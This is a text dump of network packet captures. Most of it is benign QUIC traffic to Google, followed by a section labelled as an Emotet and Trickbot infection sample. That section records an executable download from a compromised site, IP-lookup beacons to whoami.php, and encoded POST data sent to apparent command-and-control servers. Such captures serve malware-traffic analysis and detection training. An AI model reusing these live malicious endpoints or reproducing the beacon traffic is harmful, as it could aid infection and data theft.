.e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*. 2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.x@....M ..e.. ..7...$..@:..k..$b.S.c...$....lhZW_.. 2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28 E..8.y@...'i ..e.....…$. @.<4……#8o.$.1Y..D….W76 2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....: 2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254 E....|@....g ..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y* 2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.}@....H ..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z 2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337 E..m.~@..... ..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF.. 2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8..@….@ ..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o. 2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5. 2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7 2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$..@M.....K?...J...T.J.pU.].... 2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z. 2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M.. 2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8. @..... ..e.. ......$..@M.....K?.}..j...!.@.z.Du..9 2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.!@..... ..e.. ......$..@M.....K?.......B#...._MC}.h 2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.H@..... ..e.. ......$4O@M.....K?....P0.&..%.M..9*Y. 2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.I@..... ..e.. ......$..@M.....K?...,.OJ.......9uP4. 2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.J@..... ..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR. 2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.K@..... ..e.. ......$a.@M.....K?....J.G.... ..c...k 2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.L@..... ..e.. ......$;@@M.....K?..."h.A...1....&... 2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41 E..E.T@..... ..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_.. 2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.W@..... ..e.. ......$|.@M.....K?....F. .h."........ 2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296 E..D..@..... ..e.. ..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@…Y1
.e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T…..A.|…
.e.P…y.e….P…….HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename=”i5pv72yr.exe”
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@…vV
.eB. …….g…..P…”…GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E…..@…..
.e…….Pr..G..^.P…….POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….K
.eh…….=y…..mP…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….I
.eh………x…3`P…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E…]…..].B. .
.e……….h(P….P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]……p….
.e.P….^.r.!.P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E…..@…k.
.eB. .. ……d…P….x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T